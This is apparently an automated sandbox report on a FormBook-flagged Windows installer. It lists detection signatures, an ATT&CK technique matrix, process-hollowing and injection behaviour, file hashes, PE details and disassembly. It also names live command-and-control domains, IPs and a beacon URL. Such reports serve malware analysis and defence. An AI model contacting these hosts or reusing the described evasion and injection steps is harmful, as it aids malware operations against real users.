          Source: Yara matchFile source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (techniques listed per tactic column; a number shown before a technique is the report's own counter for that technique, reproduced as extracted)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Native API; 1 Shared Modules; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: 1 Access Token Manipulation; 512 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: 1 Rootkit; 2 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 512 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing
Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 System Time Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 114 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Credential API Hooking; 1 Archive Collected Data; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Data Encrypted for Impact
Behavior Graph (ID: 626276, Sample: SecuriteInfo.com.Variant.Ja..., Start date: 13/05/2022, Architecture: WINDOWS, Score: 100)

Start: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures
  SecuriteInfo.com.Variant.Jaik.72878.10638.exe (started)
    dropped: C:\Users\user\AppData\Local\...\fdvucso.exe, PE32
    fdvucso.exe (started): Tries to detect virtualization through RDTSC time measurements
      fdvucso.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected): System process connects to network (likely due to code injection or exploit)
          DNS/IP: www.qzbozhijy.com 170.75.150.177, 49809, 80, QUICKPACKETUS, United States; www.lume24.com; www.cryptocurrenciesmarketcaps.com 35.186.238.101, 49871, 80, GOOGLEUS, United States
          cmd.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            cmd.exe (started)
              conhost.exe (started)

Antivirus detection, submitted file
Source | Detection | Scanner | Label
SecuriteInfo.com.Variant.Jaik.72878.10638.exe | 42% | Virustotal |
SecuriteInfo.com.Variant.Jaik.72878.10638.exe | 44% | ReversingLabs | Win32.Trojan.FormBook
SecuriteInfo.com.Variant.Jaik.72878.10638.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Antivirus detection, unpacked PE files
Source | Detection | Scanner | Label
2.0.fdvucso.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.2.fdvucso.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.0.fdvucso.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.0.fdvucso.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.fdvucso.exe.a70000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Antivirus detection, domains
Source | Detection | Scanner | Label
www.lume24.com | 1% | Virustotal |

Antivirus detection, URLs
Source | Detection | Scanner | Label
www.worklifefirewalls.com/m9y5/ | 2% | Virustotal |
www.worklifefirewalls.com/m9y5/ | 0% | Avira URL Cloud | safe
http://www.qzbozhijy.com/m9y5/?GDHDO=orMzR/RfXnMhfSAyBjBjnR1lGR+TvkHzuwdFBkAhJBLh1eKTDfMMMN4zoKLE4Jh6elIQ&2d0tk4=7nxxAXLHM4 | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.cryptocurrenciesmarketcaps.com | 35.186.238.101 | true | false | | unknown
www.qzbozhijy.com | 170.75.150.177 | true | true | | unknown
www.lume24.com | unknown | unknown | true | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
www.worklifefirewalls.com/m9y5/ | true | 2%, Virustotal; Avira URL Cloud: safe | low
http://www.qzbozhijy.com/m9y5/?GDHDO=orMzR/RfXnMhfSAyBjBjnR1lGR+TvkHzuwdFBkAhJBLh1eKTDfMMMN4zoKLE4Jh6elIQ&2d0tk4=7nxxAXLHM4 | true | Avira URL Cloud: safe | unknown

URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
https://zz.bdstatic.com/linksubmit/push.js | cmd.exe, 0000000D.00000002.695248264.000000000384F000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | SecuriteInfo.com.Variant.Jaik.72878.10638.exe | false | | high
http://push.zhanzhang.baidu.com/push.js | cmd.exe, 0000000D.00000002.695248264.000000000384F000.00000004.10000000.00040000.00000000.sdmp | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
35.186.238.101 | www.cryptocurrenciesmarketcaps.com | United States | 15169 | GOOGLEUS | false
170.75.150.177 | www.qzbozhijy.com | United States | 46261 | QUICKPACKETUS | true
                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:626276
Start date and time: 13/05/2022 19:42:12 (2022-05-13 19:42:12 +02:00)
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:SecuriteInfo.com.Variant.Jaik.72878.10638.10974 (renamed file extension from 10974 to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:28
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@9/4@4/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 89% (good quality ratio 83%)
                    • Quality average: 74.4%
                    • Quality standard deviation: 30.6%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    No context
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):80384
                    Entropy (8bit):6.294173225862387
                    Encrypted:false
                    SSDEEP:1536:jsTaC+v1CUfr0oxAomP3cX/4pi2sWjcdaXI:Ca5wUD1/ui5a4
                    MD5:8CA00DF697FFA200C6CA558754C49F37
                    SHA1:4A84F286472799A541BFEF17CFC9F746C7B692D3
                    SHA-256:3D9400A6D9CA60C3BBE4212BA2727924E086A41CD2634D5CE1C4B8D9EE02F9DD
                    SHA-512:1451AC47CF1FD29AF252E75657A99486165404CF891A43E3FB617DCE6C5168AF42D1B0E62EC34E463AE168AFCDF9763107629C1A4DA862760C21232F789538B3
                    Malicious:true
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...a.~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):189439
                    Entropy (8bit):7.9917863154165305
                    Encrypted:true
                    SSDEEP:3072:UMe+HAL1YEIOIaeq6vQwmi25nAQquhWdC8cSiQmjgLzylj/YUhljifyucPqP:E9aVOIaeqlwmDKQqM8cSdvEgUH+fR+O
                    MD5:BE2AEB25761BA4A8F20FBD04EA588971
                    SHA1:95528D502D8DDB7A3ECF3524378876EC08FBD348
                    SHA-256:586F3F57F0BA77EE87F999E6AE034375A5BB07D9A6CC95AB9D185EECD933A963
                    SHA-512:8AAFDD4E154B8633D311DF4EF929DE4BD9B0F2147CA7582FE10359B8FC6048F4AE815C276589C8AC177C43F55F4015B2336C5CE6CB6FABAA08BE4B2BCA5C91D3
                    Malicious:false
                    Preview:]....)8.z.E....{T`Z2Kb.P.....$.Qd.23....)e....a...............W.g%........I..[h..5G.*.a=..(>.....{.....a....,..N.B.1.X.m..8..(}..........9....+.&.ol...x...x. .:.KHy.6..n4.bJOt.w s)...^..4........K.Vjx[.(.?.w.(...).U.....M..N,.c....AY.#.TkD.G.:TPc.K.y)8..x.....G..r2.h....U.!..1QdT23....)X..a....6.........@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.h.....^......R..2.K.Vjx[.(+?{.l%".Z.......M..7.c.d..A.G#.T2D.\.:Tfc.b...y)8.zx.....G...2......U...$.Qd.23....)e....a..............@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.w s)...^M.4..NR.....K.Vjx[.(+?{.l%"..Z.U.....M..7.c.d..A.G#.T2D.\.:Tfc.b...y)8.zx.....G...2......U...$.Qd.23....)e....a..............@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.w s)...^M.4..NR.....K.Vjx[.(+?{.l%"..Z.U.....M..
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):281488
                    Entropy (8bit):7.6561639892830335
                    Encrypted:false
                    SSDEEP:6144:k9aVOIaeqlwmDKQqM8cSdvEgUH+fR+MwQd:IkOKqlDKxHcWMzGJw2
                    MD5:C5E6696957D25D8DEC8049B2F737C62D
                    SHA1:790E266C7FFAC4588626301B5090B6CA26B15020
                    SHA-256:8694698785F5AF0E04B78A6E36103B65A3A50D825B77C1848D4EC35C8A471E36
                    SHA-512:0744F7CEF46106D1CA98661B91928AC7C90494D65059EF062EA4A14AE419F2DFD97A84F2C9F6A49F81D1073B19326E849AE38500AA008D006CE34071C1453B6A
                    Malicious:false
                    Preview:........,...................A...............................................................................................................................................................................................................................................................G...................j...............................................................................................................................h...........!...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4797
                    Entropy (8bit):6.202556793925154
                    Encrypted:false
                    SSDEEP:96:oV6T0r9Eo29FYSfUCvAy6gsaW6pAMIVcZ8B0Fs8+u:oV6T0mFYwUKAyBVa1VRWFiu
                    MD5:69750989332A51572B9E510D66ABBDCF
                    SHA1:D74C3B8C3280B05B816E89D09C2AE9274403002C
                    SHA-256:BB4AEE81C87AF317EF9CA3C2C3906B73E748391DEEDBDE1BEDDA841F8147EE44
                    SHA-512:9E9F1DA33F13F2DF7BC626E56D1138AEE3EC44EDFF73FC5E8D97206B8EAC576D76E621C1C7168D17A6292F61EF3A6624D69F3B2D054888B9A67FC4114E2E1CB8
                    Malicious:false
                    Preview:VA5==.Y.Y......M=<.}.<0.]<.}.<0.U...=....===..Q=..9..-....U.===..e..i..9..-....Uc===..m..q..9..-....Un===..u..y..9..-....U.===..}...J-A..5..}@@.9...]..a..-.UA.v..U..Y..U...A~.o.-.TN..U@..A.......Q.aM..U====.A!Bx.....e...m...u....}....]...U..S.-...9T....Q..[>.M..e...5<B..M@..U====..!A ===.A!:x..Q...M...v.9=.Y..<.}.<0...5.=..9....5.=..-.1~..~A......5.=...5.>.....v.9=.3.LU.?==U.?==.1=...lLU.?==U.?==.5=.:.LU.?==U.?==.5=.Y.Y.<.}.<0.U...-===..e....J.=.3...==.............XaU.B==.}....5..5..v=..:e..:i..U..5.~^=..:e..:i.?.5..}=..Be....lLUx>==.Uo....QX<..U...5U.....Q.JQ=.C..M=XD..M>===..Mv.A=.Y.Y.<.}.<0.U....===..}....J.=.3...==.............XaU.A==.}<..===..5..5..v=..:}..:...9..5.~^=..:}..:...-..5.n^..:}..:...1.v.5..o@..2}..2...U..5.~^?..:}..:..B.5..}=..B}..3.LU_===.UV....Q.J%=.5..U..%.>X4..%..1..-..9..5U.....Q.JQ=.C..M=XD..M>===..Mv.1=.Y.Y)...-===..a....J.=.3...==.............XaU.@==.}....5..5..v=..:a..:U..9..5.~^=..:a..:U.?.5..}=..Ba..:.LU"===.U.....QX;..9..5U...
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.911203365939466
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    File size:277920
                    MD5:69250f55fbfe48822c838b4eeaf33a0a
                    SHA1:3e4e1dd9dbeb98ec354f7a03d455a0a38ccea4e5
                    SHA256:752d0155c769033832d6845eabba29bce2b9d0eedff734b31a49c879ed08ff72
                    SHA512:8bb1f40992a1e829d7b6ce9751dec84d849c50bdf72a1bcd8da9362c8cca0521729f9031fcf6f19438c147702eb601b31fcec9ea9e230e2a00b0ed9b679e6aa6
                    SSDEEP:6144:LOtIOb+kdk/PekMHsLKhnbdAnYlqQZvtBA6o3fX:LOLbhdkXekMMLAnbuYlL7BAP
                    TLSH:C444228077E5A273DA013A335EB76B764FEDD81262A1E703C3C03E593D3EA454A5E522
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:....
                    Icon Hash:b2a88c96b2ca6a72
                    Entrypoint:0x403646
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:61259b55b8912888e90f516ca08dc514
                    Instruction
                    push ebp
                    mov ebp, esp
                    sub esp, 000003F4h
                    push ebx
                    push esi
                    push edi
                    push 00000020h
                    pop edi
                    xor ebx, ebx
                    push 00008001h
                    mov dword ptr [ebp-14h], ebx
                    mov dword ptr [ebp-04h], 0040A230h
                    mov dword ptr [ebp-10h], ebx
                    call dword ptr [004080C8h]
                    mov esi, dword ptr [004080CCh]
                    lea eax, dword ptr [ebp-00000140h]
                    push eax
                    mov dword ptr [ebp-0000012Ch], ebx
                    mov dword ptr [ebp-2Ch], ebx
                    mov dword ptr [ebp-28h], ebx
                    mov dword ptr [ebp-00000140h], 0000011Ch
                    call esi
                    test eax, eax
                    jne 00007FAF089421CAh
                    lea eax, dword ptr [ebp-00000140h]
                    mov dword ptr [ebp-00000140h], 00000114h
                    push eax
                    call esi
                    mov ax, word ptr [ebp-0000012Ch]
                    mov ecx, dword ptr [ebp-00000112h]
                    sub ax, 00000053h
                    add ecx, FFFFFFD0h
                    neg ax
                    sbb eax, eax
                    mov byte ptr [ebp-26h], 00000004h
                    not eax
                    and eax, ecx
                    mov word ptr [ebp-2Ch], ax
                    cmp dword ptr [ebp-0000013Ch], 0Ah
                    jnc 00007FAF0894219Ah
                    and word ptr [ebp-00000132h], 0000h
                    mov eax, dword ptr [ebp-00000134h]
                    movzx ecx, byte ptr [ebp-00000138h]
                    mov dword ptr [007A8B58h], eax
                    xor eax, eax
                    mov ah, byte ptr [ebp-0000013Ch]
                    movzx eax, ax
                    or eax, ecx
                    xor ecx, ecx
                    mov ch, byte ptr [ebp-2Ch]
                    movzx ecx, cx
                    shl eax, 10h
                    or eax, ecx
                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b9000 | 0xa50 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x67c4 | 0x6800 | False | 0.675180288462 | data | 6.49518266675 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.14106681717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39ebb8 | 0x600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x3a9000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3b9000 | 0xa50 | 0xc00 | False | 0.401692708333 | data | 4.18753619353 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3b9190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x3b9478 | 0x100 | data | English | United States
RT_DIALOG | 0x3b9578 | 0x11c | data | English | United States
RT_DIALOG | 0x3b9698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3b96f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x3b9710 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 13, 2022 19:44:48.145380020 CEST | 49809 | 80 | 192.168.2.5 | 170.75.150.177
May 13, 2022 19:44:48.256453037 CEST | 80 | 49809 | 170.75.150.177 | 192.168.2.5
May 13, 2022 19:44:48.276657104 CEST | 49809 | 80 | 192.168.2.5 | 170.75.150.177
May 13, 2022 19:44:48.311563969 CEST | 49809 | 80 | 192.168.2.5 | 170.75.150.177
May 13, 2022 19:44:48.424303055 CEST | 80 | 49809 | 170.75.150.177 | 192.168.2.5
May 13, 2022 19:44:48.424365044 CEST | 80 | 49809 | 170.75.150.177 | 192.168.2.5
May 13, 2022 19:44:48.440042973 CEST | 49809 | 80 | 192.168.2.5 | 170.75.150.177
May 13, 2022 19:44:48.791579008 CEST | 49809 | 80 | 192.168.2.5 | 170.75.150.177
May 13, 2022 19:44:48.903620005 CEST | 80 | 49809 | 170.75.150.177 | 192.168.2.5
May 13, 2022 19:45:29.052391052 CEST | 49871 | 80 | 192.168.2.5 | 35.186.238.101
May 13, 2022 19:45:29.071583986 CEST | 80 | 49871 | 35.186.238.101 | 192.168.2.5
May 13, 2022 19:45:29.071784973 CEST | 49871 | 80 | 192.168.2.5 | 35.186.238.101
May 13, 2022 19:45:29.073164940 CEST | 49871 | 80 | 192.168.2.5 | 35.186.238.101
May 13, 2022 19:45:29.092152119 CEST | 80 | 49871 | 35.186.238.101 | 192.168.2.5
May 13, 2022 19:45:29.187019110 CEST | 80 | 49871 | 35.186.238.101 | 192.168.2.5
May 13, 2022 19:45:29.187047958 CEST | 80 | 49871 | 35.186.238.101 | 192.168.2.5
May 13, 2022 19:45:29.187232971 CEST | 49871 | 80 | 192.168.2.5 | 35.186.238.101
May 13, 2022 19:45:29.187288046 CEST | 49871 | 80 | 192.168.2.5 | 35.186.238.101
May 13, 2022 19:45:29.496124029 CEST | 49871 | 80 | 192.168.2.5 | 35.186.238.101
May 13, 2022 19:45:29.513092995 CEST | 80 | 49871 | 35.186.238.101 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
